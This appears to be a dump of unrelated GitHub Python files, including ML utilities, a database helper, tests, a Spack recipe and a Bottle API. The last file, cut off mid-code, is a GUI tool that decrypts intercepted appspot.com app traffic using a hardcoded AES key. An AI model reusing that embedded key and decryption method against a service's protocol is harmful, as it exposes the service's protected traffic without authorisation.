= corr\n\n stackedAll = np.stack([predEpoch.flatten(), targEpoch.flatten()])\n if self.corHistoryMode == \"pearson\":\n corrAll = np.corrcoef(stackedAll)[0,1]\n elif self.corHistoryMode == \"spearman\":\n corrAll, _ = sciStats.spearmanr(stackedAll.transpose((1,0)))\n else:\n raise ValueError(\"Invalid ground \")\n\n self.epochHist[\"pred\"] = []\n self.epochHist[\"targ\"] = []\n self.epochHist[\"path\"] = []\n return corrAll, corrSplit\n\n def distanceL2(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n return F.mse_loss(x, y, reduction='none')\n\n def distanceL1(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n return F.l1_loss(x, y, reduction='none')\n","repo_name":"tum-pbs/VOLSIM","sub_path":"src/volsim/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"73"} +{"seq_id":"31904044838","text":"#import player\nfrom .player import Player\nfrom .round import Round\nfrom .helper import iterateZero\n\nclass Team:\n def initDB(cursor):\n Team.cur = cursor\n Team._createTeamTable()\n Team._createTeamPlayersTable()\n\n def initConnect(cursor):\n Team.cur = cursor\n\n def _createTeamTable():\n Team.cur.execute(\"\"\"DROP TABLE IF EXISTS team_list\"\"\")\n Team.cur.execute(\"\"\"CREATE TABLE team_list (\n team_id serial PRIMARY KEY,\n team_name VARCHAR(30) NOT NULL,\n team_color CHAR(6),\n round_id int)\"\"\")\n\n def _createTeamPlayersTable():\n Team.cur.execute(\"\"\"DROP TABLE IF EXISTS team_players\"\"\")\n Team.cur.execute(\"\"\"CREATE TABLE team_players (\n player_id int,\n team_id int,\n added timestamp DEFAULT statement_timestamp() )\"\"\")\n\n# modify teams\n def add(teamName, color, roundId):\n if not Round.existingId(roundId):\n print(\"Warning. Team\", teamName, \"not added, because roundId\", roundId, \"doesn't exist.\")\n return\n if not Team._getIdByName(teamName, roundId):\n Team.cur.execute(\"\"\"INSERT INTO team_list (team_name, round_id, team_color)\n VALUES (%s, %s, %s)\"\"\", (teamName, roundId, color))\n print(\"Team\", teamName, \"added to round\", Round.getName(roundId))\n return Team._getIdByName(teamName, roundId)\n else:\n print(\"Warning! Team\", teamName, \"not added, it already exists.\")\n\n def addPlayer(playerId, teamId):\n if not Team.removePlayer(playerId, teamId):\n return\n Team.cur.execute(\"\"\"INSERT INTO team_players (player_id, team_id)\n VALUES (%s, %s)\"\"\", (playerId, teamId))\n print(Player.getNameById(playerId), \"added to team\", Team.getNameById(teamId))\n return True\n\n def removePlayer(playerId, teamId):\n roundId = Team._getRoundIdByTeamId(teamId)\n if not roundId:\n print(\"Warning. addPlayer() round or team did not exist\")\n return False\n oldTeamId = Team.getPlayerTeamId(playerId, roundId)\n if oldTeamId:\n Team.cur.execute(\"\"\"DELETE FROM team_players\n WHERE team_id = %s AND player_id = %s\"\"\", (oldTeamId, playerId))\n return True\n\n# gets\n def _getIdByName(teamName, roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_list\n WHERE round_id = %s AND team_name = %s\"\"\", (roundId, teamName))\n return iterateZero(Team.cur.fetchone())\n\n def getNameById(teamId):\n Team.cur.execute(\"\"\"SELECT team_name\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n return iterateZero(Team.cur.fetchone())\n\n def getColorById(teamId):\n Team.cur.execute(\"\"\"SELECT team_color\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n color = iterateZero(Team.cur.fetchone())\n if not color:\n return 'FFFFFF'\n return color\n\n def _getRoundIdByTeamId(teamId):\n Team.cur.execute(\"\"\"SELECT round_id\n FROM team_list\n WHERE team_id = %s\"\"\", [teamId])\n return iterateZero(Team.cur.fetchone())\n\n def getPlayerTeamId(playerId, roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_players\n WHERE player_id = %s AND team_id IN\n (SELECT team_id FROM team_list WHERE round_id = %s)\"\"\", (playerId, roundId))\n return iterateZero(Team.cur.fetchone())\n\n def getTeamlessPlayerIdList(roundId):\n teamlessPlayers = []\n for id in Player.getAllPlayerIds():\n if not Team.getPlayerTeamId(id, roundId):\n teamlessPlayers.append(id)\n return teamlessPlayers\n\n# get lists\n def getTeamPlayerIdList(teamId):\n Team.cur.execute(\"\"\"SELECT player_id\n FROM team_players\n WHERE team_id = %s\"\"\", [teamId])\n playerIds = Team.cur.fetchall()\n return sum(playerIds, ())\n\n def getTeamsIdList(roundId):\n Team.cur.execute(\"\"\"SELECT team_id\n FROM team_list\n WHERE round_id = %s\"\"\", [roundId])\n teamIds = Team.cur.fetchall()\n return sum(teamIds, ())\n\n","repo_name":"mahfiaz/spotter_irl","sub_path":"engine/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73362778475","text":"\"\"\"\nModules implements RESTful API for accessing the service\n\"\"\"\n\nimport uvicorn\n\nfrom . import (\n application,\n endpoints,\n models\n)\nfrom .application import (\n # app,\n add_quit_callback\n)\n\nfrom .. import log_utils\n\n# APP_PATH = \"app.api.application:app\"\n\n\ndef build_uvicorn_server(host=\"0.0.0.0\", port=8080) -> uvicorn.Server:\n \"\"\"\n Builds an ASGI server\n \"\"\"\n cfg = uvicorn.Config(\n application.app,\n host=host,\n port=port,\n log_level=log_utils.get_lib_log_level()\n )\n return uvicorn.Server(cfg)\n\n\nasync def start_server(server=None):\n \"\"\"\n Launches API server in the current async loop\n NOTE: by default uses uvicorn\n \"\"\"\n if server is None:\n server = build_uvicorn_server()\n await server.serve()\n","repo_name":"Booplicate/currency-service","sub_path":"app/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14602438199","text":"\"\"\"\nContains shared functions used between functions\n\"\"\"\nimport pygame\nfrom .assets import *\n\n\ndef draw_button(display: pygame.display, rect: pygame.Rect, button_txt: str, disabled=False, small_font=False):\n \"\"\"\n Draw button\n :param display: display to draw onto\n :param rect: size of button as rect\n :param button_txt: text of button\n :param disabled: if button should be disabled\n :param small_font: to use small font or not\n :return:\n \"\"\"\n if not disabled:\n outline = black\n fill = light_grey\n else:\n outline = black_transparent\n fill = light_grey_transparent\n if not small_font:\n font = bold_48_font\n else:\n font = regular_29_font\n text_width = font.get_rect(f\"{button_txt}\")[2]\n text_height = font.get_rect(f\"{button_txt}\")[3]\n text_x = (rect.x + (rect.width//2)) - (text_width // 2)\n text_y = (rect.y + (rect.height//2)) - (text_height // 2)\n pygame.draw.rect(display, fill, rect)\n pygame.draw.rect(display, outline, rect, 1)\n font.render_to(display, (text_x, text_y), f\"{button_txt}\", outline)\n\n","repo_name":"vlee489/AC31009-Client","sub_path":"classes/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2405214320","text":"from model.graph import (\n NId,\n)\nfrom syntax_graph.syntax_nodes.pair import (\n build_pair_node,\n)\nfrom syntax_graph.syntax_nodes.symbol_lookup import (\n build_symbol_lookup_node,\n)\nfrom syntax_graph.types import (\n SyntaxGraphArgs,\n)\nfrom utils.graph import (\n adj_ast,\n)\nfrom utils.graph.text_nodes import (\n node_to_str,\n)\n\n\ndef reader(args: SyntaxGraphArgs) -> NId:\n graph = args.ast_graph\n n_attrs = graph.nodes[args.n_id]\n key_id = n_attrs.get(\"label_field_key\")\n value_id = n_attrs.get(\"label_field_value\")\n if value_id and key_id:\n if graph.nodes[value_id][\"label_type\"] == \"block_node\":\n value_id = adj_ast(graph, value_id)[-1]\n return build_pair_node(args, key_id, value_id)\n\n symbol = node_to_str(graph, args.n_id)\n return build_symbol_lookup_node(args, symbol)\n","repo_name":"cognettings/vulscanner","sub_path":"skims/skims/syntax_graph/syntax_readers/yaml/block_mapping_pair.py","file_name":"block_mapping_pair.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"32843790882","text":"from unittest.mock import patch\n\nimport geopy.geocoders\nfrom geopy.geocoders import LiveAddress\nfrom test.geocoders.util import BaseTestGeocoder, env\n\n\nclass TestUnitLiveAddress:\n dummy_id = 'DUMMY12345'\n dummy_token = 'DUMMY67890'\n\n def test_user_agent_custom(self):\n geocoder = LiveAddress(\n auth_id=self.dummy_id,\n auth_token=self.dummy_token,\n user_agent='my_user_agent/1.0'\n )\n assert geocoder.headers['User-Agent'] == 'my_user_agent/1.0'\n\n @patch.object(geopy.geocoders.options, 'default_scheme', 'http')\n def test_default_scheme_is_ignored(self):\n geocoder = LiveAddress(auth_id=self.dummy_id, auth_token=self.dummy_token)\n assert geocoder.scheme == 'https'\n\n\nclass TestLiveAddress(BaseTestGeocoder):\n\n @classmethod\n def make_geocoder(cls, **kwargs):\n return LiveAddress(\n auth_id=env['LIVESTREETS_AUTH_ID'],\n auth_token=env['LIVESTREETS_AUTH_TOKEN'],\n **kwargs\n )\n\n async def test_geocode(self):\n await self.geocode_run(\n {\"query\": \"435 north michigan ave, chicago il 60611 usa\"},\n {\"latitude\": 41.890, \"longitude\": -87.624},\n )\n","repo_name":"geopy/geopy","sub_path":"test/geocoders/smartystreets.py","file_name":"smartystreets.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":4130,"dataset":"github-code","pt":"73"} +{"seq_id":"71135850157","text":"from bottle import route, run, template, request, response\nimport here\nimport json\n\n\n@route('/data/v1/route')\ndef index():\n options = []\n params = dict(request.query.decode())\n try:\n destination = params['destination']\n mylocation = params['location']\n koordinates = here.get_koordinates(destination)\n kilometers = here.get_km_car(mylocation, koordinates)[0]\n car = here.get_km_car(mylocation, koordinates)\n bike = here.get_route_bike(mylocation, koordinates)\n bus = here.get_route_bus(mylocation, koordinates)\n walk = here.get_route_walk(mylocation, koordinates)\n options.append({'name': 'car', 'kilometers': car[0], 'time': car[1],'trees':car[0]*122*10**(-3)/21})\n options.append({'name': 'bike', 'kilometers': bike[0], 'time': bike[1], 'trees':bike[0]*122*10**(-3)/21, 'cal': bike[0]*30})\n options.append({'name': 'walk', 'kilometers': walk[0], 'time': walk[1], 'trees':walk[0]*122*10**(-3)/21, 'cal': walk[0]*76})\n if bus:\n options.append({'name': 'bus',\n 'number': bus[0] + \" \" + bus[1],\n 'vstopna': bus[2],\n 'izstopna': bus[3],\n 'leaving_time': bus[4],\n 'arriving_time': bus[5],\n 'time': bus[6]})\n json_object = {'destination': destination,\n 'kilometers': kilometers,\n 'options': options}\n response.content_type = 'application/json'\n return json.dumps(json_object)\n except Exception as e:\n print(e)\n return 'Bad request'\n\n\nrun(host='localhost', port=8888)\n","repo_name":"tinaZwittnig/Carbonex","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"10052093378","text":"import shutil, os, glob\n\ndef exists_remove(path):\n if os.path.exists(path):\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n return True\n return False\n\ndef make_clear_dir(path):\n exists_remove(path)\n os.mkdir(path)\n\ndef not_exists_mkdir(path):\n if not os.path.exists(path):\n os.mkdir(path)\n return True\n return False\n\n\nmake_clear_dir(\"dist/\")\n\nnot_exists_mkdir(\"test-Standalone/\") or exists_remove(\"test-Standalone/Geyser-roolback-for-mojang-login-Standalone.jar\")\n\n\nfor i in glob.glob(\"../Geyser-roolback-for-mojang-login/bootstrap/*/build/libs/Geyser-*\"):\n name_ends = i[i.rfind('-') : ]\n out_name = \"dist/Geyser-roolback-for-mojang-login\" + name_ends\n print(out_name)\n shutil.copy(i, out_name)\n if name_ends == \"-Standalone.jar\":\n shutil.copy(i, \"test-Standalone/Geyser-roolback-for-mojang-login-Standalone.jar\")\n\n\nprint(\"OK!\")\n","repo_name":"bddjr/Geyser-roolback-for-mojang-login-release-replicator","sub_path":"run_copy.py","file_name":"run_copy.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5019899624","text":"# Add to genetics.py file\n\nimport tensorflow as tf\nimport numpy as np\n\n\nclass Brain:\n def __init__(self, genome):\n self.genome = genome\n self.model = tf.keras.models.Sequential(\n [\n tf.keras.layers.Dense(10, activation=\"relu\"), # hidden layer 1\n tf.keras.layers.Dense(10, activation=\"relu\"), # hidden layer 2\n tf.keras.layers.Dense(4, activation=\"softmax\"), # output layer\n ]\n )\n\n # Explicitly build the model\n self.model.build((None, 8)) # input_shape: batch_size x number_of_input_neurons\n\n # Convert the genome to weights and biases\n weights, biases = self.genome_to_weights_and_biases()\n\n # Set the weights and biases\n self.model.set_weights(\n [weights[0], biases[0], weights[1], biases[1], weights[2], biases[2]]\n )\n\n def genome_to_weights_and_biases(self):\n # Convert genome into a list of weights and biases\n weights = []\n biases = []\n\n # Weights and biases for first layer\n weights.append(np.array(self.genome[:80]).reshape((8, 10)))\n biases.append(np.array(self.genome[80:90]))\n\n # Weights and biases for second layer\n weights.append(np.array(self.genome[90:190]).reshape((10, 10)))\n biases.append(np.array(self.genome[190:200]))\n\n # Weights and biases for output layer\n weights.append(np.array(self.genome[200:240]).reshape((10, 4)))\n biases.append(np.array(self.genome[240:]))\n\n return weights, biases\n\n def decide(self, inputs):\n inputs = np.array(inputs)[np.newaxis, ...] # add batch dimension\n outputs = self.model.predict(inputs)[0] # remove batch dimension\n return np.argmax(outputs)\n","repo_name":"nickwoods2/hinterwelt","sub_path":"src/genetics.py","file_name":"genetics.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1913748704","text":"from spack.package import *\n\n\nclass PyMultiqc(PythonPackage):\n \"\"\"MultiQC is a tool to aggregate bioinformatics results across many\n samples into a single report. It is written in Python and contains modules\n for a large number of common bioinformatics tools.\"\"\"\n\n homepage = \"https://multiqc.info\"\n pypi = \"multiqc/multiqc-1.0.tar.gz\"\n\n version(\"1.15\", sha256=\"ce5359a12226cf4ce372c6fdad142cfe2ae7501ffa97ac7aab544ced4db5ea3c\")\n version(\"1.14\", sha256=\"dcbba405f0c9521ed2bbd7e8f7a9200643047311c9619878b81d167300149362\")\n version(\"1.13\", sha256=\"0564fb0f894e6ca0822a0f860941b3ed2c33dce407395ac0c2103775d45cbfa0\")\n version(\"1.7\", sha256=\"02e6a7fac7cd9ed036dcc6c92b8f8bcacbd28983ba6be53afb35e08868bd2d68\")\n version(\"1.5\", sha256=\"fe0ffd2b0d1067365ba4e54ae8991f2f779c7c684b037549b617020ea883310a\")\n version(\"1.3\", sha256=\"cde17845680131e16521ace04235bb9496c78c44cdc7b5a0fb6fd93f4ad7a13b\")\n version(\"1.0\", sha256=\"1a49331a3d3f2e591a6e9902bc99b16e9205731f0cd2d6eaeee0da3d0f0664c9\")\n\n depends_on(\"python@2.7:\", when=\"@:1.7\", type=(\"build\", \"run\"))\n depends_on(\"python@3:\", when=\"@1.9:\", type=(\"build\", \"run\"))\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-matplotlib@2.1.1:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-matplotlib@2.1.1:2\", type=(\"build\", \"run\"), when=\"@1.7\")\n depends_on(\"py-matplotlib@:2.1.0\", type=(\"build\", \"run\"), when=\"@1.5\")\n depends_on(\"py-matplotlib\", type=(\"build\", \"run\"), when=\"@:1.3\")\n depends_on(\"py-networkx@2.5.1:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-networkx@:1\", type=(\"build\", \"run\"), when=\"@1.3\")\n depends_on(\"py-numpy\", type=(\"build\", \"run\"))\n depends_on(\"py-click\", type=(\"build\", \"run\"))\n depends_on(\"py-coloredlogs\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-future@0.14.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-jinja2@3.0.0:\", type=(\"build\", \"run\"), when=\"@1.14:\")\n depends_on(\"py-jinja2@2.9:\", type=(\"build\", \"run\"), when=\"@:1.13\")\n depends_on(\"py-lzstring\", type=(\"build\", \"run\"))\n depends_on(\"py-markdown\", type=(\"build\", \"run\"), when=\"@1.3:\")\n depends_on(\"py-pyyaml\", type=(\"build\", \"run\"))\n depends_on(\"py-pyyaml@4:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-requests\", type=(\"build\", \"run\"), when=\"@1.3:\")\n depends_on(\"py-rich@10:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-rich-click\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-simplejson\", type=(\"build\", \"run\"))\n depends_on(\"py-spectra@0.0.10:\", type=(\"build\", \"run\"), when=\"@1.5:\")\n depends_on(\"py-spectra\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-multiqc/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"22557497269","text":"#!/usr/bin/python3\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition as dec\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\n\"\"\"\nCreates a PCA plot (principal component analysis).\n\"\"\"\n\ndf_initial = pd.read_csv(snakemake.input.df, sep='\\t')\ndf_copy = df_initial.copy()\ny = df_initial['label']\n\n# First the CV vs total_train split\nX_total_train, X_cv, y_total_train, y_cv = train_test_split(df_initial, y, test_size=0.15,\n random_state=42, stratify=y)\n\n# Next the total_train is split into train and test sets (1077 and 232 correspond\n# to the number of examples in train and test sets respectively to get an\n# approximately 70 % and 15 % of all examples in these two datasets)\nX_train, X_test, y_train, y_test = train_test_split(X_total_train, y_total_train,\n test_size=232, train_size=1077, random_state=42,\n stratify=y_total_train)\n\n\nX = df_initial.drop(['label', 'gene_id_sno'], axis=1)\nX_test_copy = X_test.copy()\nX_test_copy = X_test_copy.drop(['label', 'gene_id_sno'], axis=1)\n\n\n# Normalize data for PCA\nval = X.values\nnorm_val = StandardScaler().fit_transform(val)\n\nval_test = X_test_copy.values\nnorm_val_test = StandardScaler().fit_transform(val_test)\n\n\n# Create PCA analysis with 2 principal components for all snoRNAs\npca_all = dec.PCA(n_components=2, random_state=42)\nprincipal_components_all = pca_all.fit_transform(norm_val)\nprincipal_df_all = pd.DataFrame(data=principal_components_all, columns=['Principal_component_1', 'Principal_component_2'])\nprint('Explained variation per principal component: {}'.format(pca_all.explained_variance_ratio_)) # returns the proportion of variance explained by each component\nprint('For each component, the proportion of each columns composing the component is: {}'.format(pca_all.components_)) # returns an array of the proportion that each column contributes per component;\n\n# Create PCA analysis with 2 principal components for snoRNAs in test set only\npca_test = dec.PCA(n_components=2, random_state=42)\nprincipal_components_test = pca_test.fit_transform(norm_val_test)\nprincipal_df_test = pd.DataFrame(data=principal_components_test, columns=['Principal_component_1', 'Principal_component_2'])\nprint('Explained variation per principal component: {}'.format(pca_test.explained_variance_ratio_))\nprint('For each component, the proportion of each columns composing the component is: {}'.format(pca_test.components_))\n\n\n# Create the (pca) scatter plot for all snoRNAs\npc1_all = round(pca_all.explained_variance_ratio_[0] * 100, 2)\npc2_all = round(pca_all.explained_variance_ratio_[1] * 100, 2)\n\nplt.rcParams['svg.fonttype'] = 'none'\nfig, ax = plt.subplots(1, 1, figsize=(15, 15))\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\nax.set_xlabel(f'Principal Component 1 ({pc1_all} %)', fontsize=15)\nax.set_ylabel(f'Principal Component 2 ({pc2_all} %)', fontsize=15)\nprincipal_df2_all = pd.concat([principal_df_all, df_copy[['label', 'intergenic']]], axis=1)\nprincipal_df2_all['label'] = principal_df2_all['label'].replace([0, 1], ['not_expressed', 'expressed'])\nprincipal_df2_all['intergenic'] = principal_df2_all['intergenic'].replace([0, 1], ['intronic', 'intergenic'])\n\ncrits = list(snakemake.params.colors_dict.keys())\ncolors = list(snakemake.params.colors_dict.values())\n\n# Plot each hue separately on the same ax\nfor crit, color in zip(crits, colors):\n indicesToKeep = principal_df2_all[snakemake.wildcards.pca_hue] == crit\n ax.scatter(principal_df2_all.loc[indicesToKeep, 'Principal_component_1'],\n principal_df2_all.loc[indicesToKeep, 'Principal_component_2'],\n c=color, s=50)\n\nplt.legend(crits, prop={'size': 15})\nplt.savefig(snakemake.output.pca_all, dpi=600)\n\n\n# Create the (pca) scatter plot for snoRNAs in test set only\npc1_test = round(pca_test.explained_variance_ratio_[0] * 100, 2)\npc2_test = round(pca_test.explained_variance_ratio_[1] * 100, 2)\n\nplt.rcParams['svg.fonttype'] = 'none'\nfig2, ax2 = plt.subplots(1, 1, figsize=(15, 15))\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\nax2.set_xlabel(f'Principal Component 1 ({pc1_test} %)', fontsize=15)\nax2.set_ylabel(f'Principal Component 2 ({pc2_test} %)', fontsize=15)\nprincipal_df2_test = pd.concat([principal_df_test, X_test[['label', 'intergenic']].reset_index()], axis=1)\nprincipal_df2_test['label'] = principal_df2_test['label'].replace([0, 1], ['not_expressed', 'expressed'])\nprincipal_df2_test['intergenic'] = principal_df2_test['intergenic'].replace([0, 1], ['intronic', 'intergenic'])\n\ncrits = list(snakemake.params.colors_dict.keys())\ncolors = list(snakemake.params.colors_dict.values())\n\n\n# Plot each hue separately on the same ax\nfor crit, color in zip(crits, colors):\n indicesToKeep = principal_df2_test[snakemake.wildcards.pca_hue] == crit\n ax2.scatter(principal_df2_test.loc[indicesToKeep, 'Principal_component_1'],\n principal_df2_test.loc[indicesToKeep, 'Principal_component_2'],\n c=color, s=50)\n\nplt.legend(crits, prop={'size': 15})\nplt.savefig(snakemake.output.pca_test, dpi=600)\n","repo_name":"etiennefc/Abundance_determinants_snoRNA","sub_path":"scripts/python/graphs/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74278701036","text":"import math\n\n\ndef main(y):\n if y < 8:\n return 1 + 97 * pow(y, 4)\n elif 8 <= y < 94:\n return pow(y, 7)\n elif 94 <= y < 125:\n return pow(math.log(y), 6)\n else:\n return pow(y, 3) + 44 * (pow(y, 4) + pow(y, 5))\n\n\nif __name__ == \"__main__\":\n print(main(26))\n","repo_name":"lebeDEV02/mirea-python","sub_path":"eight-funcitons/second-function.py","file_name":"second-function.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"27483021768","text":"import gzip\nimport json\nimport os\nfrom base64 import b64decode\nfrom tkinter.filedialog import askdirectory, askopenfilename\nfrom xml.etree import ElementTree as ET\n\nimport glfw\nimport imgui\nimport OpenGL.GL as gl\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nfrom imgui.integrations.glfw import GlfwRenderer\n\nkey = b'do8PxbqYKV7cexTrt4J3fmgBtXXzu+dP'\niv = b'\\x00' * 16\n\nids = []\nmethods = []\nrequests = []\nresponses = []\nselected_id = -1\nfilter_text = ''\n\nrequest_data = ''\nrequest_raw = ''\nrequest_json = ''\nresponse_data = ''\nresponse_raw = ''\nresponse_json = ''\nrequest_json_min = False\nresponse_json_min = False\n\ndef decrypt_request(data):\n cipher = AES.new(key, AES.MODE_CBC, iv=iv)\n data = unpad(cipher.decrypt(b64decode(data, b'-_')), 16)\n data = bytearray(data)[16:]\n return json.loads(data)\n\ndef decrypt_response(data):\n cipher = AES.new(key, AES.MODE_CBC, iv=iv)\n data = unpad(cipher.decrypt(b64decode(data, b'-_')), 16)\n data = gzip.decompress(bytearray(data)[16:])\n return json.loads(data)\n\ndef load_file(filename, reset=True):\n global ids, methods, requests, responses, selected_id\n if not filename:\n return\n if reset:\n ids = []\n methods = []\n requests = []\n responses = []\n selected_id = -1\n update_data()\n try:\n tree = ET.parse(filename)\n root = tree.getroot()\n for item in root:\n host = item.find('host').text\n if 'appspot.com' in host and 'webview' not in host:\n request = b64decode(item.find('request').text).decode('utf-8')\n response = b64decode(item.find('response').text).decode('utf-8')\n methods.append(item.find('path').text)\n requests.append(request)\n responses.append(response)\n ids = [n for n in range(len(methods))]\n except:\n pass\n\ndef load_folder(directory):\n global ids, methods, requests, responses, selected_id\n if not directory:\n return\n ids = []\n methods = []\n requests = []\n responses = []\n selected_id = -1\n update_data()\n for root, dirs, files in os.walk(directory):\n for name in files:\n load_file(os.path.join(root, name), reset=False)\n\ndef update_data():\n global ids, requests, responses, selected_id\n global request_header, request_raw, request_json\n global response_header, response_raw, response_json\n global request_json_min, response_json_min\n \n if selected_id in ids:\n request = requests[selected_id].splitlines()\n request_header = '\\n'.join(request[:-1])\n request_raw = request[-1]\n if request_json_min:\n request_json = json.dumps(\n decrypt_request(request_raw), ensure_ascii=False,\n separators=(',', ':')\n )\n else:\n request_json = json.dumps(\n decrypt_request(request_raw), ensure_ascii=False, indent=4\n )\n response = responses[selected_id].splitlines()\n response_header = '\\n'.join(response[:-1])\n response_raw = response[-1]\n if response_json_min:\n response_json = json.dumps(\n decrypt_response(response_raw), ensure_ascii=False,\n separators=(',', ':')\n )\n else:\n response_json = json.dumps(\n decrypt_response(response_raw), ensure_ascii=False, indent=4\n )\n else:\n request_header = request_raw = request_json = ''\n response_header = response_raw = response_json = ''\n\ndef main():\n global ids, methods, requests, responses, selected_id, filter_text\n global request_header, request_raw, request_json\n global response_header, response_raw, response_json\n global request_json_min, response_json_min\n\n imgui.create_context()\n window = impl_glfw_init()\n impl = GlfwRenderer(window)\n\n io = impl.io\n io.fonts.clear()\n io.fonts.add_font_from_file_ttf(\n 'fonts/Roboto-Medium.ttf', 24,\n io.fonts.get_glyph_ranges_latin()\n )\n tc_font = io.fonts.add_font_from_file_ttf(\n 'fonts/NotoSansTC-Medium.otf', 24,\n io.fonts.get_glyph_ranges_chinese_full()\n )\n impl.refresh_font_texture()\n\n while not glfw.window_should_close(window):\n glfw.poll_events()\n impl.process_inputs()\n\n imgui.new_frame()\n\n imgui.set_next_window_position(0, 0)\n imgui.set_next_window_size(io.display_size.x, io.display_size.y)\n imgui.begin('', flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_MENU_BAR)\n\n if imgui.begin_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked_open_file, _ = imgui.menu_item('Open File')\n if clicked_open_file:\n load_file(askopenfilename())\n clicked_open_folder, _ = imgui.menu_item('Open Folder')\n if clicked_open_folder:\n load_folder(askdirectory())\n clicked_quit, _ = imgui.menu_item('Quit')\n if clicked_quit:\n exit(1)\n imgui.end_menu()\n imgui.end_menu_bar()\n\n imgui.columns(3, border=False)\n\n imgui.begin_child('methods')\n _, filter_text = imgui.input_text('##filter', filter_text, 256)\n imgui.columns(2, border=False)\n imgui.set_column_offset(1, 50)\n for i in ids:\n if filter_text not in methods[i]:\n continue\n clicked, _ = imgui.selectable(\n str(i), selected_id == i, imgui.SELECTABLE_SPAN_ALL_COLUMNS\n )\n if clicked:\n selected_id = i\n update_data()\n imgui.next_column()\n imgui.text(methods[i])\n imgui.next_column()\n imgui.columns(1)\n imgui.end_child()\n imgui.next_column()\n\n show_request_header, _ = imgui.collapsing_header('Request Header')\n if show_request_header:\n if imgui.button('Copy Request Header'):\n glfw.set_clipboard_string(None, request_header)\n imgui.input_text_multiline(\n '##request header', request_header, len(request_header) + 2,\n -1, flags=imgui.INPUT_TEXT_READ_ONLY\n )\n show_request_raw, _ = imgui.collapsing_header(\n 'Request Data (Raw, Encrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_request_raw:\n imgui.input_text(\n '##request raw', request_raw, len(request_raw) + 2,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.same_line()\n if imgui.button('Copy Request Data (Raw)'):\n glfw.set_clipboard_string(None, request_raw)\n show_request_json, _ = imgui.collapsing_header(\n 'Request Data (JSON, Decrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_request_json: \n if imgui.radio_button('Minify Request JSON', request_json_min):\n request_json_min = not request_json_min\n update_data()\n imgui.same_line()\n if imgui.button('Copy Request Data (JSON)'):\n glfw.set_clipboard_string(None, request_json)\n with imgui.font(tc_font):\n imgui.input_text_multiline(\n '##request json', request_json,\n len(request_json.encode('utf-8')) + 2, -1, height=-1,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.next_column()\n\n show_response_header, _ = imgui.collapsing_header('Response Header')\n if show_response_header:\n if imgui.button('Copy Response Header'):\n glfw.set_clipboard_string(None, response_header)\n imgui.input_text_multiline(\n '##response header', response_header, len(response_header) + 2,\n -1, flags=imgui.INPUT_TEXT_READ_ONLY\n )\n show_response_raw, _ = imgui.collapsing_header(\n 'Response Data (Raw, Encrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_response_raw:\n imgui.input_text(\n '##response raw', response_raw, len(response_raw) + 2,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.same_line()\n if imgui.button('Copy Response Data (Raw)'):\n glfw.set_clipboard_string(None, response_raw)\n show_response_json, _ = imgui.collapsing_header(\n 'Response Data (JSON, Decrypted)',\n 